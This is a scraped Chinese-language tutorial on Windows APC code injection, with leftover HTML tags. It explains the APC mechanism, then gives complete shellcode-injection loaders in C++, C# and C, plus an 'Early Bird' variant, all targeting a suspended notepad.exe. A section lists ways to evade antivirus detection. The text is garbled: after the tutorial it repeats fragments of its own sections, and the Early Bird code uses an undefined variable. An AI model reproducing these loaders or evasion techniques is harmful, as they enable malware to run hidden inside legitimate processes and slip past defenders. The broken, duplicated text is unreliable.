APC注入技术详解<\/h1>

一、APC基础概念<\/h2>

1.1 什么是APC<\/h3>
APC（Asynchronous Procedure Call，异步过程调用）是Windows系统中的一种机制，它允许在特定线程环境中异步执行代码。APC是一个链状数据结构，每个线程都维护着自己的APC队列。<\/p>

1.2 APC工作原理<\/h3>

当线程从等待状态苏醒时，会自动检查自己的APC队列<\/li>
如果存在APC过程，线程会优先执行队列中的回调函数<\/li>

APC执行遵循FIFO（先进先出）原则<\/li> <\/ul>

1.3 APC类型<\/h3>

内核模式APC<\/strong>：由系统产生<\/li>

用户模式APC<\/strong>：由应用程序产生<\/li> <\/ol>
二、APC注入原理<\/h2>
2.1 基本注入流程<\/h3>

目标程序执行到等待函数时，系统产生中断<\/li>
线程唤醒时优先调用APC队列中的回调函数<\/li>
使用QueueUserAPC插入自定义回调<\/li>
回调地址设置为LoadLibrary，参数设置为DLL路径<\/li> <\/ol>
2.2 关键API函数<\/h3>
DWORD QueueUserAPC<\/span>( <\/span><\/span> [in] PAPCFUNC pfnAPC, \/\/ APC函数指针 <\/span><\/span><\/span><\/span> [in] HANDLE hThread, \/\/ 目标线程句柄 <\/span><\/span><\/span><\/span> [in] ULONG_PTR dwData \/\/ 传递给APC函数的参数 <\/span><\/span><\/span><\/span>); <\/span><\/span><\/code><\/pre>2.3 注入前置条件<\/h3> 线程在进程内执行<\/li> 线程会调用APC队列中的函数<\/li> 应用有权限向目标线程的APC队列添加函数<\/li> 线程必须处于alertable状态才能执行APC<\/li> <\/ol> 三、APC注入实现方式<\/h2> 3.1 C++实现<\/h3> #include<\/span> <Windows.h><\/span> <\/span><\/span><\/span>#include<\/span> <iostream><\/span> <\/span><\/span><\/span><\/span> <\/span><\/span>unsigned<\/span> char<\/span> shellcode[] =<\/span> "<shellcode>"<\/span>; <\/span><\/span> <\/span><\/span>int<\/span> main<\/span>() { <\/span><\/span> LPCSTR lpApplication =<\/span> "C:<\/span>\\<\/span>Windows<\/span>\\<\/span>System32<\/span>\\<\/span>notepad.exe"<\/span>; <\/span><\/span> SIZE_T buff =<\/span> sizeof<\/span>(shellcode); <\/span><\/span> STARTUPINFOA sInfo =<\/span> {0<\/span>}; <\/span><\/span> PROCESS_INFORMATION pInfo =<\/span> {0<\/span>}; <\/span><\/span> <\/span><\/span> \/\/ 创建挂起进程 <\/span><\/span><\/span><\/span> CreateProcessA(lpApplication, NULL, NULL, NULL, FALSE, <\/span><\/span> CREATE_SUSPENDED, NULL, NULL, &<\/span>sInfo, &<\/span>pInfo); <\/span><\/span> <\/span><\/span> HANDLE hProc =<\/span> pInfo.hProcess; <\/span><\/span> HANDLE hThread =<\/span> pInfo.hThread; <\/span><\/span> <\/span><\/span> \/\/ 在目标进程分配内存 <\/span><\/span><\/span><\/span> LPVOID lpvShellAddress =<\/span> VirtualAllocEx(hProc, NULL, buff, <\/span><\/span> MEM_COMMIT, PAGE_EXECUTE_READWRITE); <\/span><\/span> PTHREAD_START_ROUTINE ptApcRoutine =<\/span> (PTHREAD_START_ROUTINE)lpvShellAddress; <\/span><\/span> <\/span><\/span> \/\/ 写入shellcode <\/span><\/span><\/span><\/span> WriteProcessMemory(hProc, lpvShellAddress, shellcode, buff, NULL); <\/span><\/span> <\/span><\/span> \/\/ 插入APC并恢复线程 <\/span><\/span><\/span><\/span> QueueUserAPC((PAPCFUNC)ptApcRoutine, hThread, NULL); <\/span><\/span> ResumeThread(hThread); <\/span><\/span> <\/span><\/span> return<\/span> 0<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre>3.2 C#实现<\/h3> using<\/span> System; <\/span><\/span>using<\/span> System.Runtime.InteropServices; <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> shellcode<\/span> { <\/span><\/span> [DllImport("Kernel32", SetLastError=true)]<\/span> <\/span><\/span> public<\/span> static<\/span> extern<\/span> IntPtr OpenProcess(uint<\/span> dwDesiredAccess, bool<\/span> bInheritHandle, uint<\/span> dwProcessId); <\/span><\/span> <\/span><\/span><\/span> [DllImport("Kernel32", SetLastError=true)]<\/span> <\/span><\/span> public<\/span> static<\/span> extern<\/span> IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, <\/span><\/span> uint<\/span> dwSize, uint<\/span> flAllocationType, uint<\/span> flProtect); <\/span><\/span> <\/span><\/span><\/span> [DllImport("Kernel32", SetLastError=true)]<\/span> <\/span><\/span> public<\/span> static<\/span> extern<\/span> bool<\/span> WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, <\/span><\/span> object<\/span> lpBuffer, uint<\/span> nSize, ref<\/span> uint<\/span> lpNumberOfBytesWritten); <\/span><\/span> <\/span><\/span><\/span> [DllImport("kernel32.dll", SetLastError=true)]<\/span> <\/span><\/span> public<\/span> static<\/span> extern<\/span> IntPtr OpenThread(ThreadAccess dwDesiredAccess, bool<\/span> bInheritHandle, uint<\/span> dwThreadId); <\/span><\/span> <\/span><\/span><\/span> [DllImport("kernel32.dll", SetLastError=true)]<\/span> <\/span><\/span> public<\/span> static<\/span> extern<\/span> IntPtr QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData); <\/span><\/span> <\/span><\/span><\/span> [DllImport("kernel32.dll", SetLastError=true)]<\/span> <\/span><\/span> public<\/span> static<\/span> extern<\/span> uint<\/span> ResumeThread(IntPtr hThread); <\/span><\/span> <\/span><\/span> \/\/ 枚举和结构体定义...<\/span> <\/span><\/span> <\/span><\/span> public<\/span> static<\/span> PROCESS_INFORMATION StartProcess(string<\/span> binaryPath) { <\/span><\/span> uint<\/span> flags = 0x00000004<\/span>; \/\/ CREATE_SUSPENDED<\/span> <\/span><\/span> STARTUPINFO startInfo = new<\/span> STARTUPINFO(); <\/span><\/span> PROCESS_INFORMATION procInfo = new<\/span> PROCESS_INFORMATION(); <\/span><\/span> CreateProcess((IntPtr)0<\/span>, binaryPath, (IntPtr)0<\/span>, (IntPtr)0<\/span>, <\/span><\/span> false<\/span>, flags, (IntPtr)0<\/span>, (IntPtr)0<\/span>, ref<\/span> startInfo, out<\/span> procInfo); <\/span><\/span> return<\/span> procInfo; <\/span><\/span> } <\/span><\/span> <\/span><\/span> public<\/span> void<\/span> Execute() { <\/span><\/span> string<\/span> b64 = "<shellcode>"<\/span>; <\/span><\/span> string<\/span> targetprocess = "C:\/Windows\/System32\/notepad.exe"<\/span>; <\/span><\/span> byte<\/span>[] shellcode = Convert.FromBase64String(b64); <\/span><\/span> uint<\/span> lpNumberOfBytesWritten = 0<\/span>; <\/span><\/span> <\/span><\/span> PROCESS_INFORMATION processInfo = StartProcess(targetprocess); <\/span><\/span> IntPtr pHandle = OpenProcess((uint<\/span>)ProcessAccessRights.All, false<\/span>, <\/span><\/span> (uint<\/span>)processInfo.dwProcessId); <\/span><\/span> <\/span><\/span> \/\/ 分配内存并写入shellcode<\/span> <\/span><\/span> IntPtr rMemAddress = VirtualAllocEx(pHandle, IntPtr.Zero, (uint<\/span>)shellcode.Length, <\/span><\/span> (uint<\/span>)MemAllocation.MEM_RESERVE | (uint<\/span>)MemAllocation.MEM_COMMIT, <\/span><\/span> (uint<\/span>)MemProtect.PAGE_EXECUTE_READWRITE); <\/span><\/span> <\/span><\/span> if<\/span>(WriteProcessMemory(pHandle, rMemAddress, shellcode, <\/span><\/span> (uint<\/span>)shellcode.Length, ref<\/span> lpNumberOfBytesWritten)) { <\/span><\/span> IntPtr tHandle = OpenThread(ThreadAccess.THREAD_ALL, false<\/span>, <\/span><\/span> (uint<\/span>)processInfo.dwThreadId); <\/span><\/span> IntPtr ptr = QueueUserAPC(rMemAddress, tHandle, IntPtr.Zero); <\/span><\/span> ResumeThread(tHandle); <\/span><\/span> } <\/span><\/span> <\/span><\/span> CloseHandle(pHandle); <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>3.3 C语言简化实现<\/h3> #include<\/span> <windows.h><\/span> <\/span><\/span><\/span>#include<\/span> <stdio.h><\/span> <\/span><\/span><\/span><\/span> <\/span><\/span>unsigned<\/span> char<\/span> shellcode[] =<\/span> {0xfc<\/span>,0x48<\/span>,0x83<\/span>}; \/\/ shellcode <\/span><\/span><\/span><\/span>unsigned<\/span> int<\/span> buff =<\/span> sizeof<\/span>(shellcode); <\/span><\/span> <\/span><\/span>int<\/span> main<\/span>(void<\/span>) { <\/span><\/span> STARTUPINFO si; <\/span><\/span> PROCESS_INFORMATION pi; <\/span><\/span> void<\/span> *<\/span> ptApcRoutine; <\/span><\/span> <\/span><\/span> ZeroMemory(&<\/span>si, sizeof<\/span>(si)); <\/span><\/span> si.cb =<\/span> sizeof<\/span>(si); <\/span><\/span> ZeroMemory(&<\/span>pi, sizeof<\/span>(pi)); <\/span><\/span> <\/span><\/span> CreateProcessA(0<\/span>, "notepad.exe"<\/span>, 0<\/span>, 0<\/span>, 0<\/span>, CREATE_SUSPENDED, 0<\/span>, 0<\/span>, &<\/span>si, &<\/span>pi); <\/span><\/span> <\/span><\/span> ptApcRoutine =<\/span> VirtualAllocEx(pi.hProcess, NULL, buff, MEM_COMMIT, PAGE_EXECUTE_READ); <\/span><\/span> WriteProcessMemory(pi.hProcess, ptApcRoutine, (PVOID)shellcode, (SIZE_T)buff, (SIZE_T *<\/span>)NULL); <\/span><\/span> <\/span><\/span> QueueUserAPC((PAPCFUNC)ptApcRoutine, pi.hThread, NULL); <\/span><\/span> ResumeThread(pi.hThread); <\/span><\/span> <\/span><\/span> return<\/span> 0<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre>四、APC注入变种：Early Bird技术<\/h2> 4.1 Early Bird原理<\/h3> Early Bird是APC注入与线程劫持的变体，利用线程初始化时会调用NtTestAlert<\/code>函数的特性：<\/p> NtTestAlert<\/code>会检查当前线程的APC队列<\/li> 线程启动时，在执行任何操作前会先调用NtTestAlert<\/code><\/li> 如果在初始状态下操作APC，可以可靠地执行shellcode<\/li> <\/ul> 4.2 Early Bird实现<\/h3> C语言实现<\/h4> #include<\/span> <Windows.h><\/span> <\/span><\/span><\/span><\/span> <\/span><\/span>int<\/span> main<\/span>() { <\/span><\/span> unsigned<\/span> char<\/span> shellcode[] =<\/span> "<shellcode>"<\/span>; <\/span><\/span> SIZE_T shellSz =<\/span> sizeof<\/span>(buff); <\/span><\/span> <\/span><\/span> STARTUPINFOA st =<\/span> {0<\/span>}; <\/span><\/span> PROCESS_INFORMATION prt =<\/span> {0<\/span>}; <\/span><\/span> <\/span><\/span> CreateProcessA("C:<\/span>\\<\/span>Windows<\/span>\\<\/span>System32<\/span>\\<\/span>notepad.exe"<\/span>, NULL, NULL, NULL, <\/span><\/span> FALSE, CREATE_SUSPENDED, NULL, NULL, &<\/span>st, &<\/span>prt); <\/span><\/span> <\/span><\/span> HANDLE victimProcess =<\/span> prt.hProcess; <\/span><\/span> HANDLE threadHandle =<\/span> prt.hThread; <\/span><\/span> <\/span><\/span> LPVOID shellAddr =<\/span> VirtualAllocEx(victimProcess, NULL, shellSz, <\/span><\/span> MEM_COMMIT, PAGE_EXECUTE_READWRITE); <\/span><\/span> PTHREAD_START_ROUTINE apcRoutine =<\/span> (PTHREAD_START_ROUTINE)shellAddr; <\/span><\/span> <\/span><\/span> WriteProcessMemory(victimProcess, shellAddr, buff, shellSz, NULL); <\/span><\/span> QueueUserAPC((PAPCFUNC)apcRoutine, threadHandle, NULL); <\/span><\/span> ResumeThread(threadHandle); <\/span><\/span> <\/span><\/span> return<\/span> 0<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre>Go语言实现<\/h4> 参考项目: go-shellcode EarlyBird<\/a><\/p> 五、防御与绕过<\/h2> 5.1 常见防御检测<\/h3> 360等安全软件会检测APC注入行为<\/li> 监控QueueUserAPC等敏感API调用<\/li> 检查进程创建时的挂起状态<\/li> <\/ol> 5.2 可能的绕过方式<\/h3> 使用合法的进程进行注入<\/li> 结合其他注入技术（如进程镂空）<\/li> 使用间接系统调用避免API监控<\/li> <\/ol> 六、参考资源<\/h2> Microsoft QueueUserAPC文档<\/a><\/li> Shellcode Injection via QueueUserAPC<\/a><\/li> APC Queue Code Injection<\/a><\/li> <\/ol>

APC注入技术详解<\/h1>

一、APC基础概念<\/h2>

1.1 什么是APC<\/h3> APC（Asynchronous Procedure Call，异步过程调用）是Windows系统中的一种机制，它允许在特定线程环境中异步执行代码。APC是一个链状数据结构，每个线程都维护着自己的APC队列。<\/p>

二、APC注入原理<\/h2>

三、APC注入实现方式<\/h2>

四、APC注入变种：Early Bird技术<\/h2>

4.2 Early Bird实现<\/h3>

Go语言实现<\/h4> 参考项目: go-shellcode EarlyBird<\/a><\/p>

五、防御与绕过<\/h2> 5.1 常见防御检测<\/h3> 360等安全软件会检测APC注入行为<\/li> 监控QueueUserAPC等敏感API调用<\/li>

5.1 常见防御检测<\/h3> 360等安全软件会检测APC注入行为<\/li> 监控QueueUserAPC等敏感API调用<\/li>

5.2 可能的绕过方式<\/h3> 使用合法的进程进行注入<\/li> 结合其他注入技术（如进程镂空）<\/li>

六、参考资源<\/h2> Microsoft QueueUserAPC文档<\/a><\/li> Shellcode Injection via QueueUserAPC<\/a><\/li> APC Queue Code Injection<\/a><\/li> <\/ol>

1.1 什么是APC<\/h3>
APC（Asynchronous Procedure Call，异步过程调用）是Windows系统中的一种机制，它允许在特定线程环境中异步执行代码。APC是一个链状数据结构，每个线程都维护着自己的APC队列。<\/p>

Go语言实现<\/h4>
参考项目: go-shellcode EarlyBird<\/a><\/p>

六、参考资源<\/h2>

Microsoft QueueUserAPC文档<\/a><\/li>
Shellcode Injection via QueueUserAPC<\/a><\/li>
APC Queue Code Injection<\/a><\/li> <\/ol>